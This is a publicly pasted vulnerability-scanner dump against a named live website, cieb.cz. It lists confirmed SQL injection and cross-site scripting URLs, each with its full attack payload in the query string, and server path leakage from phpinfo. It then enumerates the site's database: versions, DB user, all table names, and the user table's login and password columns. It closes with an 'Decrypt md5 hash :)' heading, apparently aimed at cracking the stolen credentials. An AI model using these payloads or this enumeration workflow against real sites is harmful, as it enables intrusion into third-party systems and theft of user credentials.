sroub3k

cieb.cz

Apr 26th, 2013
  1. ||| SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. URL: http://cieb.cz/p.php?p=produkt&id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&produkt_id=30
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: id
  8. Parameter Type: Querystring
  9. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  10.  
  11. Severity: Critical
  12. Confirmation: Confirmed
  13. URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  15. Parameter Name: produkt_id
  16. Parameter Type: Querystring
  17. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  18.  
  19. ||| Boolean Based SQL Injection
  20.  
  21. Severity: Critical
  22. Confirmation: Confirmed
  23. URL: http://cieb.cz/p.php?p=aktuality&id=-1 OR 17-7=10
  24. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  25. Parameter Name: id
  26. Parameter Type: Querystring
  27. Attack Pattern: -1 OR 17-7=10
  28.  
  29. Severity: Critical
  30. Confirmation: Confirmed
  31. URL: http://cieb.cz/p.php?p=produkt&id=-1 OR 17-7=10&produkt_id=30
  32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  33. Parameter Name: id
  34. Parameter Type: Querystring
  35. Attack Pattern: -1 OR 17-7=10
  36.  
  37. Severity: Critical
  38. Confirmation: Confirmed
  39. URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id=-1 OR 17-7=10
  40. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  41. Parameter Name: produkt_id
  42. Parameter Type: Querystring
  43. Attack Pattern: -1 OR 17-7=10
  44.  
  71. ||| [High Possibility] SQL Injection
  72.  
  73. Severity: Critical
  74. Confirmation: Confirmed
  75. URL: http://cieb.cz/p.php?p=aktuality&id=%27
  76. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  77. Parameter Name: id
  78. Parameter Type: Querystring
  79. Attack Pattern: %27
  80.  
  81. Severity: Critical
  82. Confirmation: Confirmed
  83. URL: http://cieb.cz/p.php?p=produkt&id=%27&produkt_id=30
  84. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  85. Parameter Name: id
  86. Parameter Type: Querystring
  87. Attack Pattern: %27
  88.  
  89. Severity: Critical
  90. Confirmation: Confirmed
  91. URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id=%27
  92. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  93. Parameter Name: produkt_id
  94. Parameter Type: Querystring
  95. Attack Pattern: %27
  96.  
  97. ||| XSS (Cross-site Scripting)
  98.  
  99. Severity: Important
  100. Confirmation: Confirmed
  101. URL: http://cieb.cz/p.php?p=produkt&id='"--></style></script><script>alert(0x0000AD)</script>&produkt_id=30
  102. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  103. Parameter Name: id
  104. Parameter Type: Querystring
  105. Attack Pattern: '"--></style></script><script>alert(0x0000AD)</script>
  106.  
  107. Severity: Important
  108. Confirmation: Confirmed
  109. URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id='"--></style></script><script>alert(0x0000B7)</script>
  110. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  111. Parameter Name: produkt_id
  112. Parameter Type: Querystring
  113. Attack Pattern: '"--></style></script><script>alert(0x0000B7)</script>
  114.  
  115. Severity: Important
  116. Confirmation: Confirmed
  117. URL: http://cieb.cz/p.php?p=aktuality&id='"--></style></script><script>alert(0x0000C2)</script>
  118. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  119. Parameter Name: id
  120. Parameter Type: Querystring
  121. Attack Pattern: '"--></style></script><script>alert(0x0000C2)</script>
  122.  
  123. Severity: Important
  124. Confirmation: Confirmed
  125. URL: http://cieb.cz/phpinfo.php?'"--></style></script><script>alert(0x0000DD)</script>
  126. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  127. Parameter Name: Query Based
  128. Parameter Type: FullQueryString
  129. Attack Pattern: '"--></style></script><script>alert(0x0000DD)</script>
  130.  
  131. Severity: Important
  132. Confirmation: Confirmed
  133. URL: http://cieb.cz/p.php?p=latky&id_latky=4&obr='"--></style></script><script>alert(0x000117)</script>&popis=Tria
  134. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  135. Parameter Name: obr
  136. Parameter Type: Querystring
  137. Attack Pattern: '"--></style></script><script>alert(0x000117)</script>
  138.  
  139. Severity: Important
  140. Confirmation: Confirmed
  141. URL: http://cieb.cz/p.php?p=latky&id_latky=4&obr=ref_48.jpg&popis='"--></style></script><script>alert(0x000119)</script>
  142. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  143. Parameter Name: popis
  144. Parameter Type: Querystring
  145. Attack Pattern: '"--></style></script><script>alert(0x000119)</script>
  146.  
  147. Severity: Important
  148. Confirmation: Confirmed
  149. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=\0\'\"--></style></script><script>netsparker(0x00011B)</script>&mesto=3&zeme=&tel=3&[email protected]&fax=3&text=3
  150. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  151. Parameter Name: adresa
  152. Parameter Type: Post
  153. Attack Pattern: '"--></style></script><script>alert(0x00011B)</script>
  154.  
  155. Severity: Important
  156. Confirmation: Confirmed
  157. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=3&email=\'\"--></style></script><script>netsparker(0x00011C)</script>&fax=3&text=3
  158. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  159. Parameter Name: email
  160. Parameter Type: Post
  161. Attack Pattern: '"--></style></script><script>alert(0x00011C)</script>
  162.  
  163. Severity: Important
  164. Confirmation: Confirmed
  165. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=3&[email protected]&fax=\'\"--></style></script><script>netsparker(0x00011D)</script>&text=3
  166. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  167. Parameter Name: fax
  168. Parameter Type: Post
  169. Attack Pattern: '"--></style></script><script>alert(0x00011D)</script>
  170.  
  171. Severity: Important
  172. Confirmation: Confirmed
  173. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=\'\"--></style></script><script>netsparker(0x00011E)</script>&adresa=3&mesto=3&zeme=&tel=3&[email protected]&fax=3&text=3
  174. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  175. Parameter Name: firma
  176. Parameter Type: Post
  177. Attack Pattern: '"--></style></script><script>alert(0x00011E)</script>
  178.  
  179. Severity: Important
  180. Confirmation: Confirmed
  181. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=\'\"--></style></script><script>netsparker(0x00011F)</script>&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=3&[email protected]&fax=3&text=3
  182. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  183. Parameter Name: jmeno
  184. Parameter Type: Post
  185. Attack Pattern: '"--></style></script><script>alert(0x00011F)</script>
  186.  
  187. Severity: Important
  188. Confirmation: Confirmed
  189. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=\0\'\"--></style></script><script>netsparker(0x00012C)</script>&zeme=&tel=3&[email protected]&fax=3&text=3
  190. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  191. Parameter Name: mesto
  192. Parameter Type: Post
  193. Attack Pattern: '"--></style></script><script>alert(0x00012C)</script>
  194.  
  195. Severity: Important
  196. Confirmation: Confirmed
  197. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=\0\'\"--></style></script><script>netsparker(0x00012F)</script>&firma=3&adresa=3&mesto=3&zeme=Czech Republic&tel=3&[email protected]&fax=3&text=3
  198. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  199. Parameter Name: prijmeni
  200. Parameter Type: Post
  201. Attack Pattern: '"--></style></script><script>alert(0x00012F)</script>
  202.  
  203. Severity: Important
  204. Confirmation: Confirmed
  205. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=\'\"--></style></script><script>netsparker(0x000140)</script>&[email protected]&fax=3&text=3
  206. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  207. Parameter Name: tel
  208. Parameter Type: Post
  209. Attack Pattern: '"--></style></script><script>alert(0x000140)</script>
  210.  
  211. Severity: Important
  212. Confirmation: Confirmed
  213. URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=3&[email protected]&fax=3&text=\'\"--></style></script><script>netsparker(0x000142)</script>
  214. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  215. Parameter Name: text
  216. Parameter Type: Post
  217. Attack Pattern: '"--></style></script><script>alert(0x000142)</script>
  218.  
  219. Severity: Important
  220. Confirmation: Confirmed
  221. URL: http://cieb.cz/admin/loginf.php?auth_res=1
  222. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  223. Parameter Name: auth_usr
  224. Parameter Type: Post
  225. Attack Pattern: '"--></style></script><script>alert(0x000425)</script>
  226.  
  227. ||| [Possible] Cross-site Scripting
  228.  
  229. Severity: Medium
  230. Confirmation: Confirmed
  231. URL: http://cieb.cz/admin/user_zadej.php?id=-1'"--></style></script><script>alert(0x000256)</script>&PHPSESSID=8cb3dde1f4b5b997ee85181bd3fe4737
  232. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  233.  
  234. Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable
  235. in many conditions; however, it still indicates a lack of correct filtering and should be addressed.
  236.  
  237. Parameter Name: id
  238. Parameter Type: Querystring
  239. Attack Pattern: -1'"--></style></script><script>netsparker(0x000256)</script>
  240.  
  241. ||| phpinfo() Information Disclosure
  242.  
  243. Severity: Low
  244. Confirmation: Confirmed
  245. URL: http://cieb.cz/phpinfo.php
  246. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  247.  
  248. ||| MySQL Database Identified
  249.  
  250. Severity : Information
  251. Confirmation: Confirmed
  252. URL: http://cieb.cz/p.php?p=produkt&id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&produkt_id=30
  253. Parameter Name: id
  254. Parameter Type: Querystring
  255. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  256.  
  257. ||| E-mail Address Disclosure
  258.  
  259. Severity : Information
  260. Confirmation: Confirmed
  261. URL: http://cieb.cz/
  262. Found E-mails:
  263.  
  264.  
  265. ||| [Possible] Internal Path Leakage (*nix)
  266.  
  267. Severity : Information
  268. Confirmation: Confirmed
  269. URL: http://cieb.cz/phpinfo.php
  270. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  271. Identified Internal Path(s):
  272.  
  273. /etc/php4/apache2/php.ini
  274. /etc/php4/apache2/conf.d
  275. /etc/php4/apache2/conf.d/curl.ini,
  276. /etc/php4/apache2/conf.d/domxml.ini,
  277. /etc/php4/apache2/conf.d/gd.ini,
  278. /etc/php4/apache2/conf.d/imap.ini,
  279. /etc/php4/apache2/conf.d/ldap.ini,
  280. /etc/php4/apache2/conf.d/mcal.ini,
  281. /etc/php4/apache2/conf.d/mcrypt.ini,
  282. /etc/php4/apache2/conf.d/mysql.ini,
  283. /etc/php4/apache2/conf.d/xslt.ini
  284. /home/unreal_e
  285. /usr/lib/php4/20050606+lfs
  286. /usr/share/php:/usr/share/pear
  287. /home/unreal_e:/tmp
  288. /usr/sbin/sendmail -t -i -f [email protected] -F Apache
  289. /usr/sbin/sendmail -t -i
  290. /etc/apache2
  291. /usr/local/bin:/usr/bin:/bin
  292.  
  293. /home/unreal_e/cieb.cz
  294. /home/unreal_e/cieb.cz/admin/stranky.php
  295. /home/unreal_e/cieb.cz/admin/index2.php
  296. /home/unreal_e/cieb.cz/admin/nastenka.php
  297. /home/unreal_e/cieb.cz/admin/header.inc.php
  298. /home/unreal_e/cieb.cz/admin/poznamka.php
  299. /home/unreal_e/cieb.cz/admin/user_uloz.php
  300.  
  301. ||| Login Page - URL: http://cieb.cz/admin/
  302.  
  303.  
  304. ||| Info DB
  305.  
  306. Target: http://cieb.cz/p.php?p=aktuality&id=-1+OR+17-7%3d10
  307. Web Server: Apache
  308. Powered-by: PHP/4.4.4-8+etch6
  309. DB Server: MySQL
  310. Resp. Time(avg): 972 ms
  311. Current User: cieb_cz@localhost
  312. Sql Version: 5.0.32-Debian_7etch12
  313. Current DB: cieb_cz
  314. System User: cieb_cz@localhost
  315. Installation dir: /usr/
  316. DB User: 'cieb_cz'@'localhost'
  317. Data Bases: information_schema, cieb_cz
  318.  
  319. Count(table_name) of information_schema.tables where table_schema=0x636965625F637A is 29
  320.  
  321. cieb_cz tables:
  322.  
  323. aktuality
  324. inzerce
  325. jazyky
  326. latky
  327. latky_jaz
  328. latky_popis
  329. level1,level2
  330. level3,level4
  331. nastenka
  332. pageviews
  333. plugin
  334. poznamka
  335. pravaObsah
  336. pravaSkup
  337. pravaplugin
  338. produkt_detail
  339. produkt_tab
  340. produkt_tech
  341. produkty
  342. produkty_jaz
  343. ref_obrazky
  344. skupiny
  345. staty
  346. uvodni_strana
  347. uzivatele
  348. volna_mista
  349. zakl_udaje
  350.  
  351. Count(column_name) of information_schema.columns where table_schema=0x636965625F637A and table_name=0x757A69766174656C65 is 7
  352.  
  353. Columns found:
  354.  
  355. iduzivatele
  356. login
  357. heslo
  358. prava
  359. idpravaSkup
  360. jmeno
  361. last
  362.  
  363. Count(*) of cieb_cz.uzivatele is 11
  364.  
  429.  
  430. ||| Decrypt md5 hash :)
  431.  